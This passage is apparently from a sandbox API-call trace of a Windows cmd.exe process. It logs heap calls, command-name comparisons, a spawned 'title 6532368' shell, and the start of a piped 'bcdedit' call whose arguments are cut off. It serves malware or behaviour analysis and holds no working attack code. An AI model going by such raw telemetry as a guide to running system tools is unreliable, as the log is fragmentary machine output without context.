out: lpBuffer="") returned 0x0 [0202.798] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.799] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.799] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.799] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.799] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.799] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.799] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.799] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.799] GetProcessHeap () returned 0x280000 [0202.799] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x38) returned 0x296570 [0202.799] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f890 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x20f890, lpFilePart=0x20f870 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f870*="system32") returned 0x13 [0202.799] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0202.799] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x20f5a0 | out: lpFindFileData=0x20f5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Windows", cAlternateFileName="")) returned 0x29b7b0 [0202.800] FindClose (in: hFindFile=0x29b7b0 | out: hFindFile=0x29b7b0) returned 1 [0202.800] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x20f5a0 | out: lpFindFileData=0x20f5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="System32", cAlternateFileName="")) returned 0x29b7b0 [0202.800] FindClose (in: hFindFile=0x29b7b0 | out: hFindFile=0x29b7b0) returned 1 [0202.800] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0202.800] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0202.800] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0202.800] GetProcessHeap () returned 0x280000 [0202.800] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ad10 | out: hHeap=0x280000) returned 1 [0202.800] GetEnvironmentStringsW () returned 0x29ad10* [0202.800] GetProcessHeap () returned 0x280000 [0202.800] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xac4) returned 0x298b40 [0202.800] FreeEnvironmentStringsW (penv=0x29ad10) returned 1 [0202.800] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.800] GetProcessHeap () returned 0x280000 [0202.800] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296570 | out: hHeap=0x280000) returned 1 [0202.800] GetProcessHeap () returned 0x280000 [0202.801] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4016) returned 0x29ad10 [0202.801] GetProcessHeap () returned 0x280000 [0202.801] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x84) returned 0x299610 [0202.801] GetProcessHeap () returned 0x280000 [0202.801] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ad10 | out: hHeap=0x280000) returned 1 [0202.801] GetConsoleOutputCP () returned 0x1b5 [0202.801] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0202.801] GetUserDefaultLCID () returned 0x409 [0202.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab87b50, cchData=8 | out: lpLCData=":") returned 2 [0202.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f9a0, cchData=128 | out: lpLCData="0") returned 2 [0202.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f9a0, cchData=128 | out: lpLCData="0") returned 2 [0202.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f9a0, cchData=128 | out: lpLCData="1") returned 2 [0202.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab9a740, cchData=8 | out: lpLCData="/") returned 2 [0202.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0202.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0202.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0202.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0202.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0202.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0202.803] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab87b40, cchData=8 | out: lpLCData=".") returned 2 [0202.803] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0202.803] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.804] GetProcessHeap () returned 0x280000 [0202.804] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20c) returned 0x299710 [0202.804] GetConsoleTitleW (in: lpConsoleTitle=0x299710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.804] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0202.804] GetProcAddress (hModule=0x76f60000, lpProcName="CopyFileExW") returned 0x76f723d0 [0202.804] GetProcAddress (hModule=0x76f60000, lpProcName="IsDebuggerPresent") returned 0x76f68290 [0202.804] GetProcAddress (hModule=0x76f60000, lpProcName="SetConsoleInputExeNameW") returned 0x76f717e0 [0202.805] GetProcessHeap () returned 0x280000 [0202.805] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4012) returned 0x29ad10 [0202.805] GetProcessHeap () returned 0x280000 [0202.805] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ad10 | out: hHeap=0x280000) returned 1 [0202.805] _wcsicmp (_String1="title", _String2=")") returned 75 [0202.805] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0202.806] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0202.806] _wcsicmp (_String1="IF", _String2="title") returned -11 [0202.806] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0202.806] _wcsicmp (_String1="REM", _String2="title") returned -2 [0202.806] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0202.806] GetProcessHeap () returned 0x280000 [0202.806] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x299930 [0202.806] GetProcessHeap () returned 0x280000 [0202.806] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1c) returned 0x294670 [0202.806] GetProcessHeap () returned 0x280000 [0202.806] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x22) returned 0x2946a0 [0202.807] GetProcessHeap () returned 0x280000 [0202.807] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x2999f0 [0202.808] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0202.808] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0202.808] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0202.808] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0202.808] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0202.808] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0202.808] GetProcessHeap () returned 0x280000 [0202.808] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x299ab0 [0202.808] GetProcessHeap () returned 0x280000 [0202.808] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x2946d0 [0202.809] GetProcessHeap () returned 0x280000 [0202.809] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x56) returned 0x299b70 [0202.810] GetProcessHeap () returned 0x280000 [0202.810] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x299bd0 [0202.810] _pipe (in: _PtHandles=0x299be0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x299be0) returned 0 [0202.810] _dup (_FileHandle=1) returned 5 [0202.811] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0202.811] _close (_FileHandle=4) returned 0 [0202.812] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0202.812] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0202.812] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0202.812] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0202.812] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0202.812] _wcsicmp (_String1="title", _String2="CD") returned 17 [0202.812] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0202.812] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0202.812] _wcsicmp (_String1="title", _String2="REN") returned 2 [0202.812] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0202.812] _wcsicmp (_String1="title", _String2="SET") returned 1 [0202.812] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0202.812] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0202.812] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0202.812] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0202.812] _wcsicmp (_String1="title", _String2="MD") returned 7 [0202.812] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0202.812] _wcsicmp (_String1="title", _String2="RD") returned 2 [0202.812] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0202.812] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0202.812] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0202.813] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0202.813] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0202.813] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0202.813] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0202.813] _wcsicmp (_String1="title", _String2="VER") returned -2 [0202.813] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0202.813] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0202.813] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0202.813] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0202.813] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0202.813] GetProcessHeap () returned 0x280000 [0202.813] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4010) returned 0x29ad10 [0202.813] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0202.813] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0202.813] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0202.813] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0202.813] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0202.813] _wcsicmp (_String1="title", _String2="CD") returned 17 [0202.813] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0202.813] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0202.813] _wcsicmp (_String1="title", _String2="REN") returned 2 [0202.813] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0202.813] _wcsicmp (_String1="title", _String2="SET") returned 1 [0202.813] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0202.813] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0202.813] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0202.813] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0202.813] _wcsicmp (_String1="title", _String2="MD") returned 7 [0202.814] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0202.814] _wcsicmp (_String1="title", _String2="RD") returned 2 [0202.814] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0202.814] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0202.814] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0202.815] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0202.815] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0202.815] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0202.815] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0202.815] _wcsicmp (_String1="title", _String2="VER") returned -2 [0202.815] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0202.815] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0202.815] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0202.815] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0202.815] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0202.815] GetProcessHeap () returned 0x280000 [0202.815] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x299c20 [0202.815] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.815] GetProcessHeap () returned 0x280000 [0202.816] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x28) returned 0x294700 [0202.816] GetProcessHeap () returned 0x280000 [0202.816] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x299ce0 [0202.816] GetProcessHeap () returned 0x280000 [0202.816] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x7c) returned 0x299f00 [0202.816] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0202.816] GetProcessHeap () returned 0x280000 [0202.816] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x29ed30 [0202.816] SetErrorMode (uMode=0x0) returned 0x1 [0202.816] SetErrorMode (uMode=0x1) returned 0x0 [0202.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x29ed40, lpFilePart=0x20f500 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f500*="system32") returned 0x13 [0202.816] SetErrorMode (uMode=0x1) returned 0x1 [0202.816] GetProcessHeap () returned 0x280000 [0202.816] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29ed30, Size=0x48) returned 0x29ed30 [0202.816] GetProcessHeap () returned 0x280000 [0202.816] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29ed30) returned 0x48 [0202.817] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0202.817] GetProcessHeap () returned 0x280000 [0202.817] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3e) returned 0x29edc0 [0202.817] GetProcessHeap () returned 0x280000 [0202.817] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x68) returned 0x299f90 [0202.817] GetProcessHeap () returned 0x280000 [0202.817] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299f90, Size=0x3e) returned 0x299f90 [0202.817] GetProcessHeap () returned 0x280000 [0202.817] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299f90) returned 0x3e [0202.817] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.817] GetProcessHeap () returned 0x280000 [0202.817] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x29fd90 [0202.822] GetProcessHeap () returned 0x280000 [0202.822] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29fd90, Size=0x7e) returned 0x29fd90 [0202.822] GetProcessHeap () returned 0x280000 [0202.822] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29fd90) returned 0x7e [0202.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.823] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x20f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f270) returned 0x299fe0 [0202.823] GetProcessHeap () returned 0x280000 [0202.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x28) returned 0x294730 [0202.823] FindClose (in: hFindFile=0x299fe0 | out: hFindFile=0x299fe0) returned 1 [0202.823] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0202.823] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0202.823] GetConsoleTitleW (in: lpConsoleTitle=0x20f7c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.900] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f578, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f538 | out: lpAttributeList=0x20f578, lpSize=0x20f538) returned 1 [0202.900] UpdateProcThreadAttribute (in: lpAttributeList=0x20f578, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f528, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f578, lpPreviousValue=0x0) returned 1 [0202.900] GetStartupInfoW (in: lpStartupInfo=0x20f690 | out: lpStartupInfo=0x20f690*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0202.901] GetProcessHeap () returned 0x280000 [0202.901] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x29fe50 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.902] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.903] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.903] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.903] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.903] GetProcessHeap () returned 0x280000 [0202.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29fe50 | out: hHeap=0x280000) returned 1 [0202.903] GetProcessHeap () returned 0x280000 [0202.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x12) returned 0x2989e0 [0202.903] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.905] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6532368\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x20f5b0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6532368\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f560 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6532368\"", lpProcessInformation=0x20f560*(hProcess=0x60, hThread=0x58, dwProcessId=0x7f4, dwThreadId=0x3d8)) returned 1 [0203.000] CloseHandle (hObject=0x58) returned 1 [0203.000] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.000] GetProcessHeap () returned 0x280000 [0203.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x298b40 | out: hHeap=0x280000) returned 1 [0203.000] GetEnvironmentStringsW () returned 0x298b40* [0203.000] GetProcessHeap () returned 0x280000 [0203.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xac4) returned 0x2a3120 [0203.000] FreeEnvironmentStringsW (penv=0x298b40) returned 1 [0203.000] GetProcessHeap () returned 0x280000 [0203.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2989e0 | out: hHeap=0x280000) returned 1 [0203.000] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f578 | out: lpAttributeList=0x20f578) [0203.000] _get_osfhandle (_FileHandle=3) returned 0x54 [0203.000] DuplicateHandle (in: hSourceProcessHandle=0x60, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0203.000] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0203.001] _close (_FileHandle=5) returned 0 [0203.001] _dup (_FileHandle=0) returned 4 [0203.002] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0203.002] _close (_FileHandle=3) returned 0 [0203.003] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0203.003] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0203.003] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0203.003] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0203.003] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0203.003] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0203.003] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0203.003] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0203.003] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0203.003] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0203.003] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0203.003] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0203.003] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0203.003] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0203.003] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0203.004] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0203.004] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0203.004] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0203.004] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0203.004] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0203.004] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0203.004] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0203.004] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0203.004] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0203.004] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0203.004] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0203.004] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0203.004] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0203.004] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0203.004] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0203.004] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0203.004] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0203.004] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0203.004] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0203.004] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0203.004] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0203.004] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0203.004] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0203.004] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0203.004] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0203.004] _wcsicmp (_String1="bcdedit", 